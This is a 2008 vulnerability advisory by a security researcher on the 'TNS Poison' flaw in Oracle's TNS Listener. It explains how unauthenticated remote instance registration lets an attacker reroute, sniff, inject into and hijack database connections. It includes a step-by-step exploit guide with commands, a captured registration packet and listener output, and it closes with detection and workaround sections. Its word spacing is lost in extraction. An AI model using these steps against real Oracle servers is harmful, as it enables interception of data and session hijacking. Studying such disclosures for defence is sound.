OracleDatabaseTNSListenerPoisonAttack

CopyrightJoxeanKoret,2008

1/20

Introduction VulnerabilityDetails:Allyourlistenersarebelongtous

Routingclientconnections Sniffingconnections Injectingarbitrarycommands(Sessionhijack) Sniffingconnectionsandforwardingclientrequests Exploitnotes TNSpoisonexploit:Stepbystepguide InformationattheRDBMSServerside TNSListener'slogfile

Exploitingthevulnerability

Detection

PossibleWorkarounds References Contact

2/20

Introduction
ThefollowingdocumentexplainsavulnerabilityfoundinallversionsofOracleDatabaseserver from1999(Oracle8i)tothelatestversion(Oracle11gfullypatched). Thevulnerability,calledTNSPoison,affectsthecomponentcalledTNSListener,whichisthe responsibleofconnectionsestablishment.Toexploitthevulnerabilitynoprivilegeisneeded,just networkaccesstotheTNSListener.The feature exploitedisenabledbydefaultinallOracle versionsstartingwithOracle8iandendingwithOracle11g.

3/20

VulnerabilityDetails:Allyourlistenersarebelongtous
TheOracleTNSListenercomponentroutesconnectionsfromtheclienttothedatabaseserver dependingonthedatabase'sinstancenamethecustomerwantstoconnectto.Theseinstancesare registeredattheTNSListenerbyusinganyofthefollowingmethods: 1. Localregistration.Thedatabase'sinternalprocessPMONconnectsviaIPCtotheTNS Listenerandregistersthedatabase'sinstancenameinthelocallistener.Thiscanbechanged by altering the system parameter LOCAL_LISTENER (ALTER SYSTEM SET LOCAL_LISTENER='LISTENER_NAME'). 2. Remoteregistration.Thedatabase'sinternalprocessPMONconnectsviaTCP(oranyother networksupportedprotocolsuch as IPX) tothe remoteTNS Listener andregisters the database'sinstancenameintheremotelistener.Thisbehaviorcanbespecifiedbysetting the system parameter REMOTE_LISTENER (ALTER SYSTEM SET REMOTE_LISTENER='REMOTE_LISTENER_NAME'). Thisfeature(remoteregistration)appearedfirstinOracle8i(1999)andiscurrentlyusedinOracle 11g as well as in all the other supported versions (Oracle9i, 10g and 11g). The process of registeringandinstanceisasfollows: 1. TheclientsendsaTNSpacketoftypeCONNECT(TNS_TYPE_CONNECT=1)tothe TNSListenerwiththefollowingNVstring:

Oracle9ito11g:(CONNECT_DATA=(COMMAND=SERVICE_REGISTER_NSGR)) Oracle8i:(CONNECT_DATA=(COMMAND=SERVICE_REGISTER))

2. TheserveranswerswithaTNSpacketoftypeACCEPT(TNS_TYPE_ACCEPT=2).After this,theprotocolcommunicationchangesabit(alldatawillbebinary). 3. The client sends a data packet (TNS_TYPE_DATA = 6) to the TNS listener which containsthefollowingdata: 1. Servicenametoregister. 2. Instancestoregisterunderthespecifiedservicename. 3. Maximumnumberofclientconnectionsallowed. 4. Currentnumberofclientconnectionsestablished. 5. Handler'sname. 6. IPaddressandporttoconnecttothedatabase. 7. ... 4. Ifthepacketiswellformed,theserverwillanswerwithanotherTNSdatapacketwiththe instancesregistered.

4/20

Afterthisstep,theinstancesandservicenamesareregisteredintheremoteTNSListenerandany connectionattempttotheTNSlistenerbyusingthespecifiedSERVICE_NAMEorSID(database's instance)willberoutedtotheremotedatabaseserver. Theconnectionestablishedtoregistertheremotedatabasemustbeopen,otherwise,theremote TNSlistener willconsiderthatthedatabasewascrashedandderegisterstheOracledatabase's instance. AccordingtotheOracledocumentation,thePMONprocess,afterthis,willcommunicatewith theTNSListenersendingupdatepackets(TNS_TYPE_DATApackets)tospecifytheloadofthe database,thenumberofcurrentlyconnectedusers,etc...Everyoneminuteor,asmost,every10 minutes(Higherdatabaseload,lowerupdateperiod). Thisway,anattackerisabletoregisteranyinstanceintheremoteTNSlistenerandconnectionsto theregisteredinstancewillberoutedtotheattackersmachinebut,isthisinteresting?Well,notvery exciting.But,whatoccursifanattackertriestoregisteronealreadyregisteredinstance'snameor servicename?TheTNSlistenerwillconsiderthisnewerregisteredinstancenameaclusterinstance (OracleRAC,RealApplicationClusters)orafailoverinstance(OracleFailover). When2ormoredatabaseinstancesareregisteredwiththesamenametheTNSlistenerwillmake load balance between all the registered remote database servers. The latest registered remote database server will receive the first client connection and the second will be routed to the previouslyregisteredremotedatabaseserver.

5/20

Routingclientconnections
The attack explained in this document can be used to, in example, route legitimate client connectionstooneattackercontrolledmachineandforwardthemtothelegitimatedatabaseserver instanceasshownbellow:

Theclientsconnectstotheattacker'scontrolledboxwhichactsasaTNSproxyandforwardsall connectionstothelegitimatedatabaseserver,asshowninthepicture.Notalltheconnectionswill beroutedthroughtheattacker'sboxastheTNSListenerwillmakeloadbalancebetweenallthe establishedinstancesbut,continuouslyregisteringthesameinstancewillassure,atleast,thatthe 50%oftheconnectionswillberoutedthroughourcontrolledbox.

6/20

Sniffingconnections
Theveryfirstuseoftheattackexplainedinthisdocumentisobvious:Theattackerownsthedataas almostalltheconnectionsgoesthroughtheattacker'sbox.Theattackercanrecordallthedata exchangedbetweenthedatabaseserverandtheclientmachinesandbothclientandserverwillbe obliviousoftheattack. Iftheattackerjustwantstoownthetarget'sdata,(s)heisdone.Gameover.

7/20

Injectingarbitrarycommands(Sessionhijack)
Asmanyoftheclientconnectionsareconnectedtothelegitimatedatabasethroughourproxy,we arealsoabletoinjectcommandsand/orhijackconnections.Toinjectcommands,simply,waitfor the customer to send an SQL query/statement, replace the contents of the statement with our desiredcommandandthat'sall. Forsession'shijack,simply,closethesocketopenedbetweentheclientandourboxandusethe establishedconnectionchannelbetweentherealdatabaseserverandourmachine.Youmaystart sendingSQLstatementsrightnow.

8/20

Exploitingthevulnerability
ThefollowingsectionsshowhowcanbelaunchedasuccessfulattackagainstoneOracledatabase. ThedevelopedexploitregisterstheservicenameORCL11intheTNSListenerandforwardsallthe connectionsfromtheattacker'scontrolledmachinetothelegitimateserver.

9/20

Sniffingconnectionsandforwardingclientrequests
Imaginethefollowingexploitscenario: 1. Thedatabaseserver'sIPaddressis192.168.1.11andhasregisteredtheinstanceORCL11. 2. Thelegitimateclient'saddressis192.168.1.12. 3. Theattackersmachine'saddressis192.168.1.25. Anattackerwillfollowthesesteps: 1. TheattackerrunsaTCPproxywhichforwardsallconnectionsto(s)herlocalport1521to therealdatabase'sserverport1521. 2. Attacker,now,connectstotheTNSListenerviaTCP/IPandsendsthefollowingconnect packet:(COMMAND=SERVICE_REGISTER_NSGR). 1. Notethatnoauthenticationisrequired. 3. Afterreceivingtheserver'sanswertheattackersendsapacketwiththefollowingdata: 1. Servicetoregister:ORCL11. 2. Addressofthefakedatabase:192.168.1.25. 3. Loadofthedatabase'sserver:0. 1. Remember:Thelowerload,thehigherpossibilitytoreceiveclientconnections. 4. Theattacker'sdevelopedexploitentersinaloopandregisterstheinstanceeveryoneminute closingthepreviouslyopenedsocket. 1. Thelastregistereddatabase'saddressisthefavoritetorerouteclientconnectionsandthe attackerwantstoreceivethemall.

10/20

Exploitnotes
Thedevelopedexploitisvalidjustfor6characterslongservicenames.Duetothecomplexityof theTNSprotocolthereisnoinstancenameindependentexploit,rightnow.Indeepresearchis underway. However, there is one easy way to change the exploit to make it working against any non 6 characterslonginstancename: 1. Createadatabaseinstancewiththesamenameinamachineunderyourcontrol. 2. Addanentrylikethefollowingtoyourtnsnames.orafile:
listener_name= (DESCRIPTION= (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.11)(PORT=1521)))

3. Changethehighlightedfieldstomatchtheaddressandportofthetarget. 4. Putansnifferinyourmachinelisteningforanyconnectionatport1521(Filter:port1521). 5. ConnectusingSQL*Plusto yourlocally createddatabaseasSYSDBAandexecutethe followingcommands: 1. $sqlplus/assysdba 2. SQL>ALTERSYSTEMSETREMOTE_LISTENER='LISTENER_NAME'; 3. SQL>ALTERSYSTEMREGISTER; 6. Youwillsee6packetsinEthereal(orthesnifferyoudecidedtouse).Ignorethe2first packets.The3rdpacket(TNS_TYPE_DATA)thatyourconfigureddatabasesendsfromyour boxtothetargetistheoneyouareinterestedin.Youmaysafelyignorealltheotherpackets. 7. Changethecontentsofthebufvariableinthesuppliedexploitwiththecontentsofthis packet. 8. Reruntheexploitagainstthetarget. NOTE:Youmayusethisasanotherattackvector.Asyourdatabase(whichhasthesamenameas thetarget)isregisteredintheremoteTNSListener,newconnectionsthatgoesthroughtheTNS listeneryoupoisonedwillberoutedtoyournewdatabase.Funny.

11/20

TNSPoisonexploit:Stepbystepguide
Thisisthestepbystepguidetoexploitthevulnerabilityexplainedinthisdocumentbyusingthe suppliedexploitandtheauxmodule: 1. Openaterminalandrunthesuppliedproxy.pyscriptasshownbellow:
$./proxy.pylocalip192.168.1.25localport1521\ remoteip192.168.1.11remoteport1521

2. Openanotherterminalandrunthesuppliedscripttnspoison.pyagainstthetargetasinthe exampleshownbellow:
$./tnspoisonv1.py192.168.1.251521ORCL11192.168.1.111521 Sendinginitialbuffer... Answer:Accept(2) Sendingregistration... '\x04N\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x04D \x08\xff\x03\x01\x00\x124444...' Answer:Data(6) '\x01J\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x01@ \x08\xff\x03\x01\x00\x1244444...' Sleepingfor10seconds...(Ctrl+Ctostop)...

Now,waitforthenewconnectionstoarrive.IfyouchecksthelistenerusingtheLSNRCTLtool youwillseethefollowing:
joxean@joxeandesktop:~$lsnrctlstatus LSNRCTLforLinux:Version11.1.0.6.0Productionon08AUG200818:53:54 Copyright(c)1991,2007,Oracle.Allrightsreserved. Connectingto(ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) STATUSoftheLISTENER AliasLISTENER VersionTNSLSNRforLinux:Version11.1.0.6.0Production StartDate08AUG200818:38:08 Uptime0days0hr.15min.46sec TraceLeveloff SecurityON:LocalOSAuthentication SNMPOFF Listener Parameter /home/joxean/oracle11g/product/11.1.0/db_2/network/admin/listener.ora File

12/20

Listener Log File /home/joxean/oracle11g/diag/tnslsnr/joxean desktop/listener/alert/log.xml ListeningEndpointsSummary... (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=1521))) ServicesSummary... Service"ORCL11"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Service"ORCL11XDB"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Service"ORCL11_XPT"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Thecommandcompletedsuccessfully joxean@joxeandesktop:~$lsnrctlservices LSNRCTLforLinux:Version11.1.0.6.0Productionon08AUG200818:54:51 Copyright(c)1991,2007,Oracle.Allrightsreserved. Connectingto(ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521)) ServicesSummary... Service"ORCL11"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Handler(s): "DEDICATED"established:0refused:0state:ready LOCALSERVER Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Handler(s): "DEDICATED"established:0refused:0state:ready REMOTESERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) Service"ORCL11XDB"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Handler(s): "D000"established:0refused:0current:0max:972state:ready DISPATCHER<machine:joxeandesktop,pid:19194> (ADDRESS=(PROTOCOL=tcp)(HOST=localhost)(PORT=42265)) Instance"ORCL11",statusREADY,has1handler(s)forthisservice...

13/20

Handler(s): "D000"established:0refused:0current:2048max:1024state:ready DISPATCHER<machine:192.168.1.25,pid:11447> (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.1.25)(PORT=57569)) Service"ORCL11_XPT"has2instance(s). Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Handler(s): "DEDICATED"established:0refused:0state:ready LOCALSERVER Instance"ORCL11",statusREADY,has1handler(s)forthisservice... Handler(s): "DEDICATED"established:0refused:0state:ready REMOTESERVER (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.25)(PORT=1521)) Thecommandcompletedsuccessfully

14/20

Detection
The followingsectionsexplainshowthisattackcanbe somewhat detectedattheserver side, althoughnooneisperfect(exceptusingOSutilities).

15/20

InformationattheRDBMSServerside
Onemaythinkthefollowing:Hey!Attheserverside,theDBAwillseethattheconnectionsare establishedfromuntrustedclients,right?.Well,yesandno. By using operating system tools, as is pretty obvious, the DBA will see that there are many connectionsfromthesameoriginhostbut,byusingtheV$SESSIONdynamicview,thatis,the Oracledatabase'ssuppliedmechanismtoseetheclientconnections,theDBAwillseethatthe connectionsareestablishedfromtrustedclients.But,theyaren't. Why the server thinks clientconnectionsarecomingfromtrustedsources? Theanswer is the following:Theserverdoesn'tcheckiftheconnectionscomesfromasocketcreatedfromthetrusted clientipaddresses,theRDBMSserverjustcheckstheusersuppliedNVstringsintheTNSconnect packet.ATNSconnectpacket(TNS_TYPE_CONNECT=1)islikethefollowing(strippingallthe binarycharacters,ofcourse):
(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=sqlplus) (HOST=joxeandesktop)(USER=joxean))) (ADDRESS=(PROTOCOL=TCP)(HOST=192.168.1.11)(PORT=1521)))

Thehighlightedfieldsarethosethatarefakeableusermodifiable.So,anyconnectionestablished throughourcontrolledmachinewillbeshownintheRDBMSserverasiftheyweremadedirectly fromtrustedclients.

16/20

TNSListener'slogfile
AnyattempttoregisteranewdatabaseinstanceorservicewillberegisteredintheTNSListener.A linelikethefollowingwillbeshown:
04AUG200821:26:29*service_register*DATABASENAME*0

Itisn'tsufficientenoughinformationbut,thisway,wemaydetectanattempttoregisteranew instance.Nointerestinginformation(likeIPaddress,clientport,etc...)isregisteredso,theTNS listener'slogfileisnotveryinteresting. ThisappliesjustforOracle8i,9iand10g.ForOracle11g,however,theinterestinginformationwill logged in the alert file(anXMLformattedfile).InOracle11ganyattempttoregistera new instancewillbeloggedinthealertfilewiththefollowinginformation: <msgtime='20080807T17:30:19.436+02:00'org_id='oracle'comp_id='tnslsnr' type='UNKNOWN'level='16'host_id='joxeandesktop' host_addr='127.0.0.1'> <txt>07AUG200817:30:19*service_register*ORCL11*0 </txt> </msg> Unfortunatelyfor us theattacker,thehost_addrfieldholdstheinformationextractedfromthe socket,notfromtheNVstrings.Oh...ThisonlyappliestoOracle11gwiththenewestsecurity featuresenabledwhichis,bytheway,defaultbehavior.Anyway,anattackdetectedattheTNS listener'sloglevelisnotadetectedattackattheRDBMSserverlevel,notanattackprevention method.

17/20

PossibleWorkarounds
Thereare manypossibleworkarounds.Theeasieroneistosetthefollowingparameterin the listener.oraconfigurationfile:dynamic_registration=off. But,sometimes,youdon'twanttoapplythisworkaround.Inexample,ifyouhaveanOracleRAC cluster,allthecluster'sinstancesmustberegisteredinbothTNSListenersso,thisworkaroundis notsuitableforOracleRACclusters.ToapplythisworkaroundwithOracleRACenvironmentsone needs to implement load balancing at the client side, changing all the client's tnsnames.ora configurationfiletoaddthecompletelistofOracleRACnodes. However, there is another possible workaround that, sometimes, is suitable for Oracle RAC environments.Editthefileprotocol.oraor,forolderversions,sqlnet.ora,attheserversideandadd thefollowingdirectives: TCP.VALIDNODE_CHECKING=YES TCP.INVITED_NODE=(Comma,separated,list,of,ALL,valid,clients,...) But,anyway,thisworkarounddoesn'tpreventvalidclientsfrombeingusedasproxies.Validclients canstillexploitthevulnerabilityregardlesstheVALIDNODE_CHECKINGdirectiveaddedasthe clientisavalidnode. But, again, there is one more suitable workaround: If customer bought (and enabled) Oracle AdvancedSecurityfeatureclientscanbeconfiguredtouseSSL/TLS.Thus,atbothclientand serverside,thefollowingparametersmustbechangedinprotocol.oraorsqlnet.ora: Clientside:SQLNET.ENCRYPTION_CLIENT=REQUIRED Serverside:SQLNET.ENCRYPTION_SERVER=REQUIRED Thevalueoftheseconfigurationdirectives must be REQUIRED andnot REQUESTED, asis prettycommon,otherwisetheattackercananswertotheconnectionattemptansweringthatnoSSL cipherissupportedattheserverside(astheattacker'scontrolledboxisfortheclientthetrusted database'sserver)andtheclientwillreconnectwithoutusingSSL.

18/20

References
OracleAdvancedSecurityManual Oracle11ghttp://download.oracle.com/docs/cd/B28359_01/network.111/b28530/asossl.htm Oracle10ghttp://download.oracle.com/docs/cd/B19306_01/network.102/b14268/toc.htm Oracle9ihttp://downloadwest.oracle.com/docs/cd/B10500_01/network.920/a96573/toc.htm Oracle8ihttp://downloaduk.oracle.com/docs/cd/A87860_01/doc/network.817/a85430/toc.htm Oracle8.1.6Registration http://www.orafaq.com/node/30 ConfiguringRemoteListenerRegistration http://download.oracle.com/docs/cd/B10501_01/network.920/a96580/listener.htm#490372

19/20

Contact
ThevulnerabilitywasfoundandresearchedbyJoxeanKoret(joxeankoret[AT]yahoo[DOT]es).

20/20